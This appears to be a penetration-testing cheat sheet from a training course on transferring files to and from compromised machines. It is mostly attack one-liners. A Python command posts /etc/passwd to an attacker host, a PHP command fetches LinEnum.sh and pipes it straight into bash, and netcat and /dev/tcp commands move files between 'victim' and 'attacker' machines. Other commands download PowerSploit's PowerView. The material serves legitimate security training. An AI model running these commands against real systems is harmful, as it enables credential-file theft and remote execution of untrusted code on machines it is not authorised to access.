Transferring files with code
Upload operations
Python3
# Start the Python uploadserver Module
python3 -m uploadserver
# Uploading a File Using a Python One-liner
python3 -c 'import requests;requests.post("http://$ipAttacker:8000/upload",files={"files":open("/etc/passwd","rb")})'
Download operations
Python
python2 Download
python2.7 -c 'import urllib;urllib.urlretrieve ("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh", "LinEnum.sh")'
Python 3 - Download
python3 -c 'import urllib.request;urllib.request.urlretrieve("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh", "LinEnum.sh")'
PHP
PHP Download with File_get_contents() and file_put_contents ()
# PHP file_get_contents() module to download content from a website combined with the file_put_contents() module to save the file into a directory. PHP can be used to run one-liners from an operating system command line using the option -r.
php -r '$file = file_get_contents("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh"); file_put_contents("LinEnum.sh",$file);'
PHP Download with Fopen()
php -r 'const BUFFER = 1024; $fremote =
fopen("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh", "rb"); $flocal = fopen("LinEnum.sh", "wb"); while ($buffer = fread($fremote, BUFFER)) { fwrite($flocal, $buffer); } fclose($flocal); fclose($fremote);'
PHP Download a File and Pipe it to Bash
php -r '$lines = @file("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh"); foreach ($lines as $line_num => $line) { echo $line; }' | bash
# The URL can be used as a filename with the @file function if the fopen wrappers have been enabled.
Ruby
Download a File:
ruby -e 'require "net/http"; File.write("LinEnum.sh", Net::HTTP.get(URI.parse("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh")))'
Perl
Download a File:
perl -e 'use LWP::Simple; getstore("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh", "LinEnum.sh");'
JavaScript
Download a File Using JavaScript and cscript.exe:
First save the following text as wget.js
:
// wget.js content:
var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false);
WinHttpReq.Send();
WScript.Echo(WinHttpReq.ResponseText);
/* To save a binary file use this code instead of previous line
BinStream = new ActiveXObject("ADODB.Stream");
BinStream.Type = 1;
BinStream.Open();
BinStream.Write(WinHttpReq.ResponseBody);
BinStream.SaveToFile("out.bin");
*/
Now, we can execute the JavaScript code and download the file from a Windows command prompt or PowerShell terminal:
cscript.exe /nologo wget.js https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1 PowerView.ps1
VBScript
VBScript ("Microsoft Visual Basic Scripting Edition") is an Active Scripting language developed by Microsoft that is modeled on Visual Basic.
We'll create a file called wget.vbs
and save the following content:
dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
dim bStrm: Set bStrm = createobject("Adodb.Stream")
xHttp.Open "GET", WScript.Arguments.Item(0), False
xHttp.Send
with bStrm
.type = 1
.open
.write xHttp.responseBody
.savetofile WScript.Arguments.Item(1), 2
end with
Now, download a File Using VBScript and cscript.exe
cscript.exe /nologo wget.vbs https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1 PowerView2.ps1
Netcat
Printing information on screen
On the server side (attacking machine):
On the client side (victim's machine):
Transfer data and save it in a file with netcat
Victim's Machine listening on <Port>
On the client side (victim's machine):
nc -lvp <port> > received.txt
# Example using Ncat
ncat -lvp <port> --recv-only > received.txt
# --recv-only: to close the connection once the file transfer is finished when using ncat.
On the server side (attacking machine):
# Data will be stored in received.txt file.
cat tobesentfile.txt | nc -v $ip <port>
# Alternative:
nc -q 0 $ipVictim <port> < tobesentfile.txt
# The option -q 0 will tell Netcat to close the connection once it finishes.
ncat --send-only $ipVictim <port> < tobesentfile.txt
# The --send-only flag, when used in both connect and listen modes, prompts Ncat to terminate once its input is exhausted.
Victim's machine connects to netcat only to receive the file
Instead of listening on our compromised machine, we can connect to a port on our attack host to perform the file transfer operation. This method is useful in scenarios where there's a firewall blocking inbound connections. Let's listen on port 443 on our attacker machine and send a file as input to Netcat.
On the server side (attacking machine):
On the client side (victim's machine): Compromised Machine Connect to Netcat to Receive the File
nc $ipAttacker 443 > tobesentfile.txt
ncat $ipAttacker 443 --recv-only > tobesentfile.txt
# If we don't have Netcat or Ncat on our compromised machine, Bash supports read/write operations on a pseudo-device file [/dev/TCP/](https://tldp.org/LDP/abs/html/devref1.html). Using /dev/tcp to Receive the File
cat < /dev/tcp/$ipAttacker/443 > received.txt
PowerShell Session File Transfer
There may be scenarios where HTTP, HTTPS, or SMB are unavailable. If that's the case, we can use PowerShell Remoting, aka WinRM, to perform file transfer operations. To create a PowerShell Remoting session on a remote computer, we will need administrative access, be a member of the Remote Management Users
group, or have explicit permissions for PowerShell Remoting in the session configuration.
PowerShell Remoting uses Windows Remote Management (WinRM), which is the Microsoft implementation of the Web Services for Management (WS-Management) protocol, to allow users to run PowerShell commands on remote computers.
Let's create an example and transfer a file from DC01
to DATABASE01
and vice versa.
Test-NetConnection -ComputerName DATABASE01 -Port 5985
ComputerName : DATABASE01
RemoteAddress : 192.168.1.101
RemotePort : 5985
InterfaceAlias : Ethernet0
SourceAddress : 192.168.1.100
TcpTestSucceeded : True
Because this session already has privileges over DATABASE01
, we don't need to specify credentials.
Create a PowerShell Remoting Session to DATABASE01
We can use the Copy-Item
cmdlet to copy a file from our local machine DC01
to the DATABASE01
session we have $Session
or vice versa.
Copy samplefile.txt from our Localhost to the DATABASE01 Session
PS C:\htb> Copy-Item -Path C:\samplefile.txt -ToSession $Session -Destination C:\Users\Administrator\Desktop\
Copy DATABASE.txt from DATABASE01 Session to our Localhost
PS C:\htb> Copy-Item -Path "C:\Users\Administrator\Desktop\DATABASE.txt" -Destination C:\ -FromSession $Session
Sharing resources
RDP
RDP (Remote Desktop Protocol) is commonly used in Windows networks for remote access.
We can use xfreerdp or rdesktop to download a file by mounting a linux folder. This shared will allow us to transfer files to and from the RDP session.
Mounting a Linux Folder Using rdesktop
rdesktop $ipVictim -d <domain> -u <username> -p <'Password0@'> -r disk:linux="/home/user/rdesktop/files"
HTB_@cademy_stdnt!
Mounting a Linux Folder Using xfreerdp
bash
xfreerdp /v:ipVictim /d:<domain> /u:<username> /p:<'Password0@'> /drive:linux,/home/plaintext/htb/academy/filetransfer
To access the directory, we can connect to \tsclient\ in Windows, allowing us to transfer files to and from the RDP session.
Last update: 2024-10-07 Created: July 5, 2023 18:03:19